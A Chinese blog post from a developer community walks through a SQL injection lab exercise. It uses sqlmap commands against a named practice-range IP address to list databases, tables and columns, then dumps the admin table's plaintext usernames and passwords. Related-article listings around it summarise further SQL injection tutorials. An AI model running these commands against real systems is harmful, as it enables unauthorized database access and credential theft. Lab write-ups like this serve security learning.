Loading [MathJax]/jax/output/CommonHTML/config.js

开发者社区

文档建议反馈控制台

文章/答案/技术大牛

发布

社区首页 >专栏 >SQL注入实战（一）

SQL注入实战（一）

作者头像

木尤

发布于 2020-07-14 07:28:55

发布于 2020-07-14 07:28:55

4620

举报

文章被收录于专栏：我的csdn我的csdn

封神台靶场

https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7

查找注入点：

sqlmap.py -u http://59.63.200.79:8003/?id=1

查找数据库

sqlmap.py -u http://59.63.200.79:8003/?id=1 --dbs

有三个数据库

available databases [3]: [] information_schema [] maoshe [*] test 初步判断是maoshe

查找maoshe下的表

sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe --tables

找到四个表：

Database: maoshe [4 tables] ±------+ | admin | | dirs | | news | | xss | ±------+

判断管理员密码在admin里面

查找admin表下面的列 sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin --column 找到三个字段 Database: maoshe Table: admin [3 columns] ±---------±------------+ | Column | Type | ±---------±------------+ | Id | int(11) | | password | varchar(11) | | username | varchar(11) | ±---------±------------+ 我们只需要账号密码字段就行了查找账号密码

sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump

找到用户名密码

Database: maoshe Table: admin [2 entries] ±---------±-----------+ | username | password | ±---------±-----------+ | admin | hellohack | | ppt领取微信 | zkaqbanban | ±---------±-----------+

本次注入完成

本文参与腾讯云自媒体同步曝光计划，分享自作者个人站点/博客。

原始发表：2020/07/10 ，如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自作者个人站点/博客前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

评论

登录后参与评论

暂无评论

编辑精选文章

换一批

万字详解高可用架构设计

Go 开发者必备：Protocol Buffers 入门指南

10分钟带你彻底搞懂分布式链路跟踪

多租户的 4 种常用方案

亿级月活的社交 APP，陌陌如何做到 3 分钟定位故障？

60页PPT全解：DeepSeek系列论文技术要点整理

墨者 - SQL注入

sql 数据库云数据库 SQL Server https 编程算法

靶场地址：https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe

Naraku

2021/07/29

7450

零基础学SQL注入必练靶场之SQLiLabs（搭建+打靶）

http 网络安全数据库 sql python

SQLi-Labs是一个专业的SQL注入漏洞练习靶场，零基础的同学学SQL注入的时候，sqli-labs这个靶场是必练的，它里面包含了很多注入场景，以及在sql注入的时候遇到的各种问题，适用于GET和POST场景，包含了以下注入：

Ms08067安全实验室

2022/12/22

4.2K0

零基础学SQL注入必练靶场之SQLiLabs（搭建+打靶）

SQL注入从入门到进阶

dns 编程算法 sql 数据库网络安全

本文章产生的缘由是因为专业老师，让我给本专业的同学讲一哈SQL注入和XSS入门，也就是本文的入门篇，讲完两节课后，发现自己对于SQL注入的理解也就仅仅局限于入门，于是有了进阶章节的产生。

小简

2022/12/29

4K0

【实战XOX】测试中国香港某药业注入漏洞

python http 安全网络安全

于是我随意的在网上找到了中国香港的一个药业网站，起先没什么，也只是看看。突然发现是存在漏洞的！！！

天钧

2019/11/11

3.3K0

【实战XOX】测试中国香港某药业注入漏洞

Sqlmap注入技巧

数据库 admin 技巧数据搜索

php+mysql注入方法：http://tieba.baidu.com/p/3723202169

纯情

2023/04/26

1.7K0

自学sql注入（二）

网络安全 http python php 云数据库 SQL Server

这是笔者自行整理出来的有关sql注入的一些知识点，自己还有些迷迷糊糊，可能有些不对的地方。等学完之后，再来详写一系列的关于sql注入的文章

宸寰客

2020/07/14

4750

SQL注入实战（二）

http actionscript 安全

封神台靶场 https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb 1.打开网站，打开一篇新闻 http://59.63.200.79:8004/

木尤

2020/07/14

4640

SQL注入小记

网络安全腾讯云测试服务 sql 数据库网站

sqlmap: sqlmap是一个开源的渗透测试工具，可以用来进行自动化检测，利用SQL注入漏洞，获取数据库服务器的权限。

用户5521279

2019/12/10

5490

SQL注入靶场Day4 宽字节注入

网络安全腾讯云测试服务 sql 数据库

mysql支持16进制输入，16进制输入可以替代字符从而避免了单引号的加入 user 16进制得到:75736572

Baige

2022/03/22

7041

SQL注入靶场Day4 宽字节注入

web安全之sql注入

数据库云数据库 SQL Server sql python php

2、sqlmap.py -u "url" -D 数据库名称 --tables 获取表名

墨文

2020/02/28

7900

SQL注入工具之SQLmap入门操作

数据库 sql 工具漏洞入门

虽然没有官方的图形化界面，但是市面上有很多个人做的图形化插件，如果实在不熟悉命令行可以考虑换成图形化插件进行使用。

测试小兵

2024/01/26

2.9K0

SQL注入工具之SQLmap入门操作

渗透测试系统学习-Day8&SQL注入靶场-Day2

网络安全 http 数据库 sql 腾讯云测试服务

这里靶场就五道题，POST注入和HEAD注入也是CTF总能碰到的基础题了，这里就直接一起总结了吧。

Baige

2022/03/12

1K0

渗透测试系统学习-Day8&SQL注入靶场-Day2

[红日安全]Web安全Day1 - SQL注入实战攻防

云数据库 SQL Server sqlite android sql 数据库

大家好，我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享，还包含一个HTB靶场供大家练习，我们给这个项目起了一个名字叫 Web安全实战，希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法（手工测试，工具测试）-靶场测试（分为PHP靶场、JAVA靶场、Python靶场基本上三种靶场全部涵盖）-实战演练（主要选择相应CMS或者是Vulnhub进行实战演练)，如果对大家有帮助请Star鼓励我们创作更好文章。如果你愿意加入我们，一起完善这个项目，欢迎通过邮件形式联系我们。

红日安全

2020/02/17

1.9K0

POST型SQL注入教学

数据库 python sql windows

上次我给大家分享的AJE-Windows里面什么工具都有，可以直接装一个AJE-Windows工具不用一个一个的下，太麻烦

酷酷的繁星

2020/04/15

2.1K1

复习 - MSSQL注入

网络安全 sql sql server 数据库 shell

MSSQL MSSQL和MySQL注入类似，但在数据结构特定函数名称上存在差异。且MSSQL与Windows平台的高契合度，使其可以使用Windows身份验证，导致其运行权限较高，若没有对权限进行限制，当存在SQL注入时，所造成的后果一般比MySQL更严重。靶场地址：墨者学院 - SQL手工注入漏洞测试(Sql Server数据库) 信息收集 -- 查询版本 select @@VERSION select * from Users where id='1' and @@VERSION like '%14%

Naraku

2021/07/29

2.2K0

SQL 注入漏洞检测与利用

网络安全数据库 sql 云数据库 SQL Server 编程算法

SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,它是利用现有应用程序将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句.

王瑞MVP

2022/12/28

4.6K0

【靶场演练】为了女神小芳，手工SQL注入实战演习

python 网络安全 sql 数据库

第一章：为了女神小芳！【配套课时：SQL注入攻击原理实战演练】题目 Tips: 通过sql注入拿到管理员密码！尤里正在追女神小芳，在得知小芳开了一家公司后，尤里通过whois查询发现了小芳公

菜菜有点菜

2022/03/17

1.1K0

【靶场演练】为了女神小芳，手工SQL注入实战演习

SQL注入-报错盲注

python http php sql 数据库

我们这期的主题报错盲注，我们就得用SQLMAP进行报错盲注的漏洞利用原文是带图的，要看有图的划到最下方有我博客链接对站点http://219.153.49.228:41592/new_list.p

酷酷的繁星

2020/04/05

7530

【网络安全】浅识 SQL 注入

数据库 sql 网络安全基础数据

SQL 注入（SQL Injection）是发生在 Web 程序中数据库层的安全漏洞，是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理，导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步获取到数据信息。

sidiot

2023/08/30

2880

【网络安全】浅识 SQL 注入

【SQL注入】通过实战教你手工注入MySql数据库

http php 网络安全数据库云数据库 SQL Server

那么我们就一起来学习一下，对PHP+MySql组合的网站，怎么进行纯手工注入吧，Here we go~

一名白帽的成长史

2019/10/08

2.1K0

【SQL注入】通过实战教你手工注入MySql数据库

相关推荐

墨者 - SQL注入

更多 >

目录

封神台靶场
- 查找注入点：
- 查找数据库
- 有三个数据库
- 查找maoshe下的表
- 找到四个表：
- 判断管理员密码在admin里面
- 找到用户名密码

加入讨论

的问答专区 >

Lion 莱恩呀0

相关课程

一站式学习中心 >

腾讯云向量数据库-RAG七天入门训练营

向量数据库

腾讯云安灯

云开发微搭低代码平台-一人构建企业级应用实战训练营

腾讯云微搭低代码

腾讯云开发玩转小程序实战训练营

云开发 CloudBase